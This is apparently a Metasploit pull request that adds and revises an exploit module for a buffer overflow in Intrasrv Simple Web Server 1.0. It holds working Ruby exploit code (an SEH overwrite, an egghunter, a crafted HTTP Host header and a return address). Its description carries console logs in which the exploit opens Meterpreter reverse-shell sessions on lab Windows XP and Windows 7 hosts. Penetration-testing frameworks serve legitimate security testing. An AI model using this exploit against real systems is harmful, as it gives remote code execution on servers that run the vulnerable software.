### PR TITLE
Intrasrv Simple Web Server 1.0 Buffer Overflow

### DIFF
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
-	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Egghunter
 
 	def initialize(info={})
@@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
+					'Space' => '4660',
 					'StackAdjustment' => -3500,
 					'BadChars' => "\x00"
 				},
@@ -60,12 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		res =  send_request_cgi({
-				'method' => 'GET',
-				'uri'    => "/"
-		})
+		begin
+			connect
+		rescue
+			print_error("Could not connect to target!")
+			return Exploit::CheckCode::Safe
+		end
+		sock.put("GET / HTTP/1.0\r\n")
+		res = sock.get
 
-		if res and res.headers['Server'] =~ /intrasrv 1.0/
+		if res =~ /intrasrv 1.0/
 			return Exploit::CheckCode::Vulnerable
 		else
 			return Exploit::CheckCode::Safe
@@ -75,27 +80,30 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# setup egghunter
 		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
-				:checksum => true
+				:checksum=>true, :eggtag=>"w00t"
 			})
 
 		# setup buffer
-		buf = rand_text(target['Offset']-128)			# junk to egghunter
-		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
+		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
+		buf << hunter						# egghunter
 		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
 		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
 		# Setup payload
-		shellcode = rand_text(50)				# pad payload
-		shellcode = egg + egg					# attach egg tags
-		shellcode << payload.encoded
+		shellcode = egg
+		# second last byte of payload gets corrupted - pad 2 bytes 
+		# so we don't corrupt the actual payload
+		shellcode << rand_text(2)
+		
+		msp = pattern_create(20000)
 
 		print_status("Sending buffer...")
-		send_request_cgi({
-				'method' => 'GET',
-				'uri'    => "/",
-				'vhost'  => buf,
-				'data'   => shellcode
-		})
+		# Payload location is an issue, so we're using the tcp mixin 
+		# instead of HttpClient here to maximize control over what's sent.
+		# (i.e. no additional headers to mess with the stack)
+		connect
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+		disconnect
 	end
 end

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# setup egghunter
 		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
-				:checksum=>true, :eggtag=>"w00t"
+				:checksum=>true
 			})
 
 		# setup buffer
@@ -92,14 +92,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Setup payload
 		shellcode = egg
-		# second last byte of payload gets corrupted - pad 2 bytes 
+		# second last byte of payload gets corrupted - pad 2 bytes
 		# so we don't corrupt the actual payload
 		shellcode << rand_text(2)
-		
-		msp = pattern_create(20000)
 
 		print_status("Sending buffer...")
-		# Payload location is an issue, so we're using the tcp mixin 
+		# Payload location is an issue, so we're using the tcp mixin
 		# instead of HttpClient here to maximize control over what's sent.
 		# (i.e. no additional headers to mess with the stack)
 		connect

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
-					'Space' => '4660',
+					'Space' => 4660,
 					'StackAdjustment' => -3500,
 					'BadChars' => "\x00"
 				},
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
 		buf << hunter						# egghunter
 		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
-		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
+		buf << "\xeb\x80" + rand_text(2)			# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
 		# second last byte of payload/egg gets corrupted - pad 2 bytes

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -58,6 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'DisclosureDate' => "May 30 2013",
 			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptPort.new('RPORT', [true, 'The remote port', 80])
+				], self.class)
 	end
 
 	def check
@@ -68,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return Exploit::CheckCode::Safe
 		end
 		sock.put("GET / HTTP/1.0\r\n")
-		res = sock.get
+		res = sock.get_once
 
 		if res =~ /intrasrv 1.0/
 			return Exploit::CheckCode::Vulnerable
@@ -90,18 +95,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
-		# Setup payload
-		shellcode = egg
-		# second last byte of payload gets corrupted - pad 2 bytes
+		# second last byte of payload/egg gets corrupted - pad 2 bytes
 		# so we don't corrupt the actual payload
-		shellcode << rand_text(2)
+		egg << rand_text(2)
 
 		print_status("Sending buffer...")
 		# Payload location is an issue, so we're using the tcp mixin
 		# instead of HttpClient here to maximize control over what's sent.
 		# (i.e. no additional headers to mess with the stack)
 		connect
-		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{egg}")
 		disconnect
 	end
 end

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_error("Could not connect to target!")
 			return Exploit::CheckCode::Safe
 		end
-		sock.put("GET / HTTP/1.0\r\n")
+		sock.put("GET / HTTP/1.0\r\n\r\n")
 		res = sock.get_once
 
 		if res =~ /intrasrv 1.0/

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
-	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Egghunter
 
 	def initialize(info={})
@@ -57,24 +57,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'DisclosureDate' => "May 30 2013",
 			'DefaultTarget'  => 0))
-
-			register_options(
-				[
-					OptPort.new('RPORT', [true, 'The remote port', 80])
-				], self.class)
 	end
 
 	def check
-		begin
-			connect
-		rescue
-			print_error("Could not connect to target!")
-			return Exploit::CheckCode::Safe
-		end
-		sock.put("GET / HTTP/1.0\r\n")
-		res = sock.get
+		res =  send_request_cgi({
+				'method' => 'GET',
+				'uri'    => "/"
+		})
 
-		if res and res =~ /intrasrv 1.0/
+		if res and res.headers['Server'] =~ /intrasrv 1.0/
 			return Exploit::CheckCode::Vulnerable
 		else
 			return Exploit::CheckCode::Safe
@@ -88,19 +79,23 @@ class Metasploit3 < Msf::Exploit::Remote
 			})
 
 		# setup buffer
-		buf = rand_text_alpha(target['Offset']-128)		# junk to egghunter
+		buf = rand_text(target['Offset']-128)			# junk to egghunter
 		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
-		buf << rand_text_alpha(target['Offset']-buf.length)	# more junk to offset
+		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
 		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
-		# attach egg tag to payload
-		shellcode = egg + egg
+		# Setup payload
+		shellcode = rand_text(1)				# align payload
+		shellcode = egg + egg					# attach egg tags
 		shellcode << payload.encoded
 
 		print_status("Sending buffer...")
-		connect
-		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
-		disconnect
+		send_request_cgi({
+				'method' => 'GET',
+				'uri'    => "/",
+				'vhost'  => buf,
+				'data'   => shellcode
+		})
 	end
 end

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -17,11 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => "Intrasrv 1.0 Buffer Overflow",
 			'Description'    => %q{
-					    This module exploits a boundary condition error in Intrasrv
-					Simple Web Server 1.0. The web interface does not validate the 
-					boundaries of an HTTP request string prior to copying the data
-					to an insufficiently large buffer. Successful exploitation leads 
-					to arbitrary remote code execution in the context of the application. 
+					This module exploits a boundary condition error in Intrasrv Simple Web
+					Server 1.0. The web interface does not validate the boundaries of an
+					HTTP request string prior to copying the data to an insufficiently large
+					buffer. Successful exploitation leads to arbitrary remote code execution
+					in the context of the application.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
 				:checksum => true
 			})
-		
+
 		# setup buffer
 		buf = rand_text_alpha(target['Offset']-128)		# junk to egghunter
 		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -1,0 +1,106 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Egghunter
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Intrasrv 1.0 Buffer Overflow",
+			'Description'    => %q{
+					    This module exploits a boundary condition error in Intrasrv
+					Simple Web Server 1.0. The web interface does not validate the 
+					boundaries of an HTTP request string prior to copying the data
+					to an insufficiently large buffer. Successful exploitation leads 
+					to arbitrary remote code execution in the context of the application. 
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'xis_one@STM Solutions',  #Discovery, PoC
+					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '94097'],
+					['EDB','18397'],
+					['BID','60229']
+				],
+			'Payload'        =>
+				{
+					'StackAdjustment' => -3500,
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "thread"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['v1.0 - XP/2003/Win7',
+						{
+							'Offset' => 1553,
+							'Ret'=>0x004097dd #p/p/r - intrasrv.exe
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "May 30 2013",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptPort.new('RPORT', [true, 'The remote port', 80])
+				], self.class)
+	end
+
+	def check
+		begin
+			connect
+		rescue
+			print_error("Could not connect to target!")
+			return Exploit::CheckCode::Safe
+		end
+		sock.put("GET / HTTP/1.0\r\n")
+		res = sock.get
+
+		if res and res =~ /intrasrv 1.0/
+			return Exploit::CheckCode::Vulnerable
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+		# setup egghunter
+		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
+				:checksum => true
+			})
+		
+		# setup buffer
+		buf = rand_text_alpha(target['Offset']-128)		# junk to egghunter
+		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
+		buf << rand_text_alpha(target['Offset']-buf.length)	# more junk to offset
+		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
+		buf << [target.ret].pack("V*") 				# seh
+
+		# attach egg tag to payload
+		shellcode = egg + egg
+		shellcode << payload.encoded
+
+		print_status("Sending buffer...")
+		connect
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+		disconnect
+	end
+end

--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		buf << [target.ret].pack("V*") 				# seh
 
 		# Setup payload
-		shellcode = rand_text(1)				# align payload
+		shellcode = rand_text(50)				# pad payload
 		shellcode = egg + egg					# attach egg tags
 		shellcode << payload.encoded
 


### PR DESCRIPTION
Intrasrv 1.0 boundary condition error RCE.

Original PoC and application download:
http://www.exploit-db.com/exploits/25836/

Tested Windows XP SP3:

```
msf exploit(intrasrv_bof) > show options

Module options (exploit/windows/http/intrasrv_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.56.101   yes       The target address
   RPORT  80               yes       The remote port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   v1.0 - XP/2003/Win7


msf exploit(intrasrv_bof) > check
[+] The target is vulnerable.
msf exploit(intrasrv_bof) > exploit

[*] Started reverse handler on 192.168.56.1:4444 
[*] Sending buffer...
[*] Sending stage (751104 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:1548) at 2013-08-10 14:48:54 -0400

meterpreter > getuid
Server username: VulnDevXPSP3\VulnUser
meterpreter > sysinfo
Computer        : VulnDevXPSP3
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
```

And Windows 7 SP1:

```
msf exploit(intrasrv_bof) > show options

Module options (exploit/windows/http/intrasrv_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.56.102   yes       The target address
   RPORT  80               yes       The remote port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   v1.0 - XP/2003/Win7


msf exploit(intrasrv_bof) > check
[+] The target is vulnerable.
msf exploit(intrasrv_bof) > exploit

[*] Started reverse handler on 192.168.56.1:4444 
[*] Sending buffer...
[*] Sending stage (751104 bytes) to 192.168.56.102
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.102:49161) at 2013-08-10 15:49:35 -0400

meterpreter > getuid
Server username: VulnDevWin7\VulnUser
meterpreter > sysinfo
Computer        : VulnDevWin7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
